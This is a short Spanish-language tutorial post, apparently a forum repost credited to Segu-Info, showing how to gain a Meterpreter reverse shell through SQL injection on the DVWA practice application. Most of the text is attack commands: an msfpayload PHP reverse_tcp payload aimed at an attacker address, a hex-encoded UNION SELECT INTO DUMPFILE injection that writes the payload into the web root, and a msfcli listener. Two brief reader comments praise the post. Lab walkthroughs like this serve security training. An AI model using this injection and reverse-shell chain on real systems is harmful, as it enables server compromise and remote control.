Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.
1. Creamos el payload:
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php
2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:
http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php
3. El codigo quedaría algo así:
233c3f7068700a0a6572726f725f7265706f7274696e672830...
4. Inyectamos el siguiente comando en la aplicación web:
' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#
5. Nos quedamos escuchando para cuando se ejecuta el payload.
msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E
5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.
6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.
(http://2.bp.blogspot.com/-umPLO2261Vg/T5sFcnvj95I/AAAAAAAAGwg/RV_UMjky9v4/s1600/Pantallazo-4.png)
FUENTE: Segu-Info
Me gusto por la combinación con metasploit ;)
Buen Aporte!